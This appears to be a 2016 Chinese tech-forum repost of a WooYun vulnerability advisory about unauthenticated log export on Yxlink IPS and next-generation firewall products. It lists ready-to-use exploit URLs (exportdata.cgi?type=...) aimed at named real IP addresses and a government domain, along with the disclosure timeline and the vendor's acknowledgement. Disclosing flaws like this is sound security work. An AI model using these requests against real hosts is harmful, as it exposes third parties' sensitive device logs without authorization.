注册
登录
标签
统计
帮助
中神通公司技术论坛
»
同行动态
» 铱迅两款产品存在未授权访问获取敏感信息(无需登录)
‹‹ 上一主题
|
下一主题 ››
发新话题
发布投票
发布商品
发布悬赏
发布活动
发布辩论
发布视频
打印
铱迅两款产品存在未授权访问获取敏感信息(无需登录)
linda
琳达
版主
发短消息
加为好友
当前离线
1
#
大
中
小
发表于 2016-1-8 15:50
显示全部帖子
铱迅两款产品存在未授权访问获取敏感信息(无需登录)
漏洞概要
缺陷编号:
WooYun-2015-134150
漏洞标题: 铱迅两款产品存在未授权访问获取敏感信息(无需登录)
相关厂商:
铱迅信息
漏洞作者:
cloud克劳德
提交时间: 2015-08-14 16:41
公开时间: 2015-11-12 17:22
漏洞类型: 敏感信息泄露
危害等级: 高
自评Rank: 15
漏洞状态: 厂商已经确认
漏洞来源:
http://www.wooyun.org
Tags标签:
未授权访问
应用敏感信息泄漏
漏洞详情披露状态:
2015-08-14: 细节已通知厂商并且等待厂商处理中
2015-08-14: 厂商已经确认,细节仅向厂商公开
2015-08-17: 细节向第三方安全合作伙伴开放(
绿盟科技
、
唐朝安全巡航
)
2015-10-08: 细节向核心白帽子及相关领域专家公开
2015-10-18: 细节向普通白帽子公开
2015-10-28: 细节向实习白帽子公开
2015-11-12: 细节向公众公开
简要描述:
铱迅两款产品存在未授权访问获取敏感信息(无需登录)
详细说明:
铱迅入侵防御系统
铱迅下一代防火墙系统
参数type=1-13,可读取设备所有类型的日志
铱迅下一代防火墙系统:
https://221.8.74.29/cgi-pub/exportdata.cgi?type=3&begintime=20130813&endtime=20150814
https://pxcz.gov.cn/cgi-pub/exportdata.cgi?type=3&begintime=20130813&endtime=20150814
https://218.94.121.236/cgi-pub/exportdata.cgi?type=3&begintime=20130813&endtime=20150814
铱迅入侵防御系统:
https://60.191.100.179/cgi-pub/exportdata.cgi?type=1&begintime=20130813&endtime=20150814
https://60.191.100.179/cgi-pub/exportdata.cgi?type=2&begintime=20130813&endtime=20150814
https://60.191.100.179/cgi-pub/exportdata.cgi?type=10&begintime=20120813&endtime=20150814
漏洞证明:
铱迅入侵防御系统
铱迅下一代防火墙系统
修复方案:
你懂的比我多
版权声明:转载请注明来源
cloud克劳德
@
乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:7
确认时间:2015-08-14 17:20
厂商回复:
感谢提交!
最新状态:
暂无
原文:
http://www.wooyun.org/bugs/wooyun-2015-0134150
搜索更多相关主题的帖子:
铱迅
yxlink
防火墙
入侵防御
IDS
非授权访问
文件下载
信息泄露
UID
123
帖子
1826
精华
5
积分
50
阅读权限
100
在线时间
761 小时
注册时间
2013-8-15
最后登录
2024-11-25
查看详细资料
TOP
‹‹ 上一主题
|
下一主题 ››
官方发布
通知公告
产品下载
购买咨询
技术讨论
系统管理
系统管理
状态统计
访问控制
基础策略
内置服务
网络设置
应用过滤
特殊应用
网络审计
WEB审计过滤(WAF)
DNS过滤
WEB代理及过滤
FTP、POP3、SMTP过滤
MSN、QQ过滤
VOIP应用
防病毒、防垃圾邮件引擎
入侵防御
蜜罐检测
IDP规则及IPS状态
远程接入
用户认证
IKEv2/IPsec
OCSERV
PPTP/L2TP
OpenVPN/SSLVPN
WireGuard
SoftEther/SSTP
SSL接入
大地云控
IT技术交流
硬件选型
虚拟化&云计算&SDN&NFV
真实IT经验
灌水聊天
同行动态
行业信息
龙门阵